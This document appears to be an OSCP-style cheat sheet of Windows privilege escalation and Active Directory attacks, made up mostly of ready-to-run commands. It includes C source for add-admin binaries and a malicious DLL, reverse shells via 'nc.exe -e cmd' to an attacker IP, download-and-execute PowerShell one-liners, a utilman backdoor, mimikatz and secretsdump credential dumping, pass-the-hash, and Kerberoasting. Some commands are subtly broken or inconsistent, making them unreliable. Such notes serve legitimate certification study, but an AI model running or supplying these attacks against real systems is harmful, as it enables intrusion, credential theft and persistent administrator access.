Master checklist

Includes both Local and AD level privesc specific to OSCP

Local Privesc [Enumeration]

Files & Creds

.\winpeas.exe quiet windowscreds

.\winpeas.exe quiet filesinfo

Sometimes there is password hidden in files, so we need to enumerate all the files

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

---

OS version

Check OS version, then check for kernal exploit or any open exploit available

systeminfo

.\winpeas.exe quiet systeminfo

---

Internal Network

netstat -antp tcp

.\winpeas.exe quiet networkinfo

---

PowerShell History File

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

---

Local Privesc [Exploitation]

Most attacks need specific rights on the binary or folder which we are supposed to attack, so we need to know the permissions:

Mask	Permission on file
F	Full Access
M	Modify Access
RX	Read & Execute Access
R	Read Access
W	Write only Access

Service Binary Hijacking

1

Find binaries with writable permissions

Use winpeas.exe to check which binary we have rights to abuse.

.\winpeas.exe servicesinfo

2

Confirm rights on the binary

icacls C:\users\vaibhav\path\to\service\binary.exe

3

Enumerate the service name for the binary

reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /f "backup.exe"
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc servicename
sc query service
sc start auditTracker
sc config <ServiceName> binPath= "C:\path\file.exe"
get-service -name auditTracker
Start-Service -Name auditTracker
Set-Service -Name auditTracker -StartupType Manual
Get-Service -Name auditTracker | Select-Object Name, Status, StartType, CanPauseAndContinue, CanStop

4

Exploitation (replace binary)

move C:\users\vaibhav\pictures\binary.exe C:\users\vaibhav\pictures\binary-old.exe
move C:\users\vaibhav\pictures\reverse-shell.exe C:\users\vaibhav\pictures\binary.exe

5

Restart / Reboot

Restart the service or reboot the system.

# Restart service
Restart-service VeyonService
# If restart not possible , reboot the system
shutdown /r /t 0

ADD-User.EXE

compile the code using linux

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

#include <stdlib.h>
int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

---

Always Install Elevated

These registry keys tell windows that a user of any privilege can install .msi files as NT AUTHORITY\SYSTEM.

1. Check via powerup.ps1 or winpeas.exe, winpeas output looks like:

   [+] Checking AlwaysInstallElevated                                           
       AlwaysInstallElevated set to 1 in HKLM!
       AlwaysInstallElevated set to 1 in HKCU!

2. Manual Recon

   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

3. Create malicious .msi file using msfvenom

4. Run exploit

   msiexec /quiet /qn /i rev.msi

---

DLL Hijacking

Download procmon.exe - https://download.sysinternals.com/files/ProcessMonitor.zip

1. Enumerate installed apps (example: 32-bit uninstall keys)

   Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

2. If anything gets listed using above command, besides from Microsoft ***, then proceed.

3. Check permission on folder

   echo "test" > 'C:\FileZilla\FileZilla FTP Client\test.txt'

4. Use procmon.exe to filter (if possible)

5. Create a malicious dll using msfvenom with reverse shell inside or use below TextShaping.dll and insert into the same folder

Build:

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

TextShaping.cpp

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user vaibhav Pass@1234 /add");
  	    i = system ("net localgroup administrators dave3 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

---

Scheduled Tasks

1

Enumerate scheduled tasks

schtasks /query /fo LIST /V

2

Identify repeating tasks

Check the Repeat: Every: tag in the output to find tasks that run on a schedule.

3

Filter useful fields

# CMD
schtasks /query /fo LIST /v | findstr /R /C:"^Author:" /C:"^TaskName:" /C:"^Task To Run:" /C:"^Run As User:" /C:"^Next Run Time:"
# VS Code Regex
^\s*(Author|TaskName|Task To Run|Run As User|Next Run Time):.*

4

Exploit by replacing task binary

move C:\users\vaibhav\pictures\binary.exe C:\users\vaibhav\pictures\binary-old.exe
move C:\users\vaibhav\pictures\binary.exe C:\users\vaibhav\pictures\binary.exe

---

Unquoted Service Path

In order to exploit, we need 2 things: Unquoted Service Path & White space between the folder name.

1

Enumerate potential unquoted paths

.\winpeas.exe quiet serviceinfo

.\powerup.ps1
	>> Get-UnquotedService

2

Manual recon for service paths

# Powershell
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
tasklist /svc
# cmd
wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """

3

Identify whether you can Start/Stop the service

Start-Service GammaService
Stop-Service GammaService
Restart-Service GammaService

4

Check permissions on folder & sub-folders where service binary exists

icacls "C:\Program Files\Enterprise Apps\Current Version\"
icacls "C:\Program Files\Enterprise Apps\"
icacls "C:\Program Files\"

5

Malicious binary naming rules

The malicious binary must be named after the name of folder/sub-folder which is writable (the word before whitespace only).

Examples:

Current.exe , Enterprise.exe , Program.exe

6

Inject malicious binary depending on writable folder

1. if "C:\Program Files\Enterprise Apps\Current Version\" is writable:

copy Current.exe "C:\Program Files\Enterprise Apps\"

1. if "C:\Program Files\Enterprise Apps\" is writable:

copy Enterprise.exe "C:\Program Files\"

1. if "C:\Program Files\" is writable:

copy Program.exe "C:\"

After injecting the binary, start the service:

Start-Service GammaService

---

Se-Impersonate Privilege

Available tools: godpotato.exe | printspoofer.exe | sweetpotato.exe

.\god.exe -cmd "net localgroup administrators username /add"
.\god.exe -cmd ".\nc.exe -e cmd 192.l68.xx.xx 443"

.\printspoffer.exe -c "net localgroup administrators username /add"
.\ps.exe -c ".\nc.exe -e cmd 192.l68.xx.xx 443"

---

Se-Restore Privilege

From Windows (evil-winrm) session

• Rename utilman.exe to utilman.old and cmd.exe to utilman.exe

  cd C:\Windows\System32
  C:\Windows\System32> ren utilman.exe utilman.old
  C:\Windows\System32> ren cmd.exe utilman.exe

• From Linux

  rdesktop $ip

This will open a new RDP window to target system. On the RDP session press the below key shortcut to get the shell as NT-Authority\SYSTEM:

win + u

---

Se-Backup Privilege

From Windows (evil-winrm) session

reg save hklm\sam c:\tmp\sam
reg save hklm\system c:\tmp\system

# File-download
download sam
download system

From Linux session, extract hash using pypykatz:

pypykatz registry --sam SAM SYSTEM

---

Se-Backup + Se-Restore [DC]

For standalone machines try standalone attack, but if we have both privileges on a domain controller, use this attack.

1

Create Distributed Shell (DSH) file on attacker

Create file.dsh (e.g., nano file.dsh) with contents:

set context persistent nowriters
add volume c: alias file
create
expose %file% z:

2

Convert to DOS format

unix2dos file.dsh

3

Upload to Windows session and run DiskShadow

diskshadow /s raj.dsh

4

Backup required files

robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system

5

Download and dump NTDS

impacket-secretsdump -ntds ntds.dit -system system local

---

AD [Environment Setup]

Execution policy Bypass

powershell.exe  -nop -ep bypass
powershell -ep bypass
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -force
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -force

---

Internal Port Scan

.\nc.exe -nv -z -w 1 10.10.92.148 21 22 53 80 88 135 139 389 443 445 636 1433 3268 3269 3306 3389 5985 5986

---

Tunneling

To tunnel any specific port

Victim:

.\chisel.exe client 192.168.45.158:8000 R:40000:localhost:40000

Attacker:

chisel server -p 8000 --reverse

With Socks

Victim:

.\chisel.exe client 192.168.45.158:8000 R:socks

Attacker:

sudo chisel server -p 8000 --socks5 --reverse

---

File Transfer

Inside Intranet

## To self
dir \\web02\C$
copy \\files02\C$\tmp\mimikatz.exe

## To victim
copy test.txt \\file02\C$\user\administrator\desktop\test.txt

From Outside

# From CMD (Download)
powershell.exe -c iex "(New-Object System.NET.WebClient).DownloadFile('http://192.168.xx.xx/w.exe','C:\tmp\w.exe')"
# Direct execution in memory
iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1")
# From powershell
Iwr -Uri http://attacker-ip/rev.exe -Outfile rev.exe

other tools: certutil.exe | curl | wget

---

AD [Enumeration]

Manual Enumeration

net user /domain
---
net user jeffadmin /domain
---
net group /domain
---
net group "Domain Admins" /domain
---

---

BloodHound Enumeration

.\sharphound.exe
.\sharphound.exe --ldapusername chen --ldappassword freedom -d sub.poseidon.yzx -c all

Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

powershell -exec bypass -command "& { Import-Module .\powerview.ps1 }"

nxc ldap dc01.certified.htb -u user -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41

cme ldap nara.nara-security.com -u Tracy.White -p 'zqwj041FGX' --bloodhound -c all -ns $ip

ldapdomaindump -u support.htb\\username -p 'password123' support.htb -o output

bloodhound-python -c all -u administrator -p pass -ns 192.168.187.172 -d laser.com -o file
bloodhound-python --zip -c all -v -k -u administrator --hashes ':15759746f66f2da88d58f0160f8ee676' -ns 192.168.187.172 -d laser.com

---

AD [Lateral Movement]

Enabling Remote Services

Enable RDP:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable PS-remoting:

Enable-PSRemoting -Force
Set-WSManQuickConfig -Force

# verify
winrm e winrm/config/listener
netstat -ano | findstr 5985

---

LM Techniques

.\psexec.exe

impacket-psexec chen:freedom@192.168.212.162

impacket-psexec Administrator@10.10.10.175 -hashes ':NTNTNTNTNTNTNTNTNT'

impacket-psexec
impacket-atexec
impacket-smbexec
impacket-wmiexec

evil -i 192.168.xx.xx -u username -p password
evil -i 192.168.xx.xx -u username -H 'NTNTNTNTNTNTNTNTNT'

xfreerdp3 /v:192.168.xx.xx /u:username /p:password /dynamic-resolution

rdesktop 192.168.xx.xx -u username -p password

---

AD [Presistence]

Adding User

Add existing user OR create new user to Local Administrator group

net localgroup administrators username /add

net localgroup [username] [password] /add

# From CMD (Download)
powershell.exe -c iex "(New-Object System.NET.WebClient).DownloadFile('http://192.168.xx.xx/w.exe','C:\tmp\w.exe')"
# From powershell
Iwr -Uri http://attacker-ip/rev.exe -Outfile rev.exe

---

Golden Ticket

---

AD [Exploitation & Attacks]

Credentials Dumping

• Impacket

  impacket-secretsdump Administrator@172.16.147.11 -hashes ':f1014ac49bae005ee3ece5f47547d185'
  impacket-secretsdump 'Eric':'Eric-password'@192.168.234.141 

• Mimikatz https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

  .\mimikatz.exe "privilege::debug" exit
  .\mimikatz.exe "token::elevate" exit
  ---
  .\mimikatz.exe "sekurlsa::logonpasswords" exit
  .\mimikatz.exe "sekurlsa::logonpasswords full" exit
  ---
  .\mimikatz.exe "lsadump::sam" exit
  .\mimikatz.exe "lsadump::cache" exit
  .\mimikatz.exe "lsadump::secrets" exit

---

AS-REP-roasting

• No Username

.\rubeus.exe asreproast /user:chen /domain:sub.poseidon.yzx /dc:192.168.212.162

impacket-GetNPUsers htb.local/ -dc-ip 192.168.xx.xx -request

• With Username

impacket-GetNPUsers -no-pass -dc-ip 192.168.xx.xx intelligence.htb/Jose.Williams

impacket-GetNPUsers cascade.local/ -no-pass -dc-ip 192.168.xx.xx -usersfile uname.txt

• With creds

impacket-GetNPUsers cascade.local/ -dc-ip 192.168.xx.xx -usersfile uname.txt

proxychains4 nxc ldap ip -u eric.wallows -p EricLikesRunning800 --asreproast out.txt

Cracking hash:

john hash ~/seclist/rockyou.txt --format=krb5asrep

.\hashcat.exe -m 18200 ..\hash.txt ..\rockyou.txt --self-test-disable

---

Kerberoasting

impacket-GetUserSPNs -request -dc-ip 192.168.xx.xx 'DOMAIN.local'/'username':'password'

proxychains4 nxc ldap ip -u eric.wallows -p EricLikesRunning800 --kerberoasting out.txt

Cracking hash:

john hash ~/seclist/rockyou.txt --format=krb5tgs

.\hashcat.exe -m 13100 ..\hash.txt ..\rockyou.txt --self-test-disable

---

Target Kerberoasting

# Add the `msDs-KeyCredentialLink` attribute to the targetUSER
pywhisker -d "administrator.htb" -u "comromisedUSER" -p 'ichliebedich' --target "targetUSER" --action "add"

# Request the TGT for 
targetedKerberoast.py -v -d 'administrator.htb' -u 'comromisedUSER' -p ichliebedich

# Crack the hash
john hash.txt /usr/share/wordlist/rockyou.txt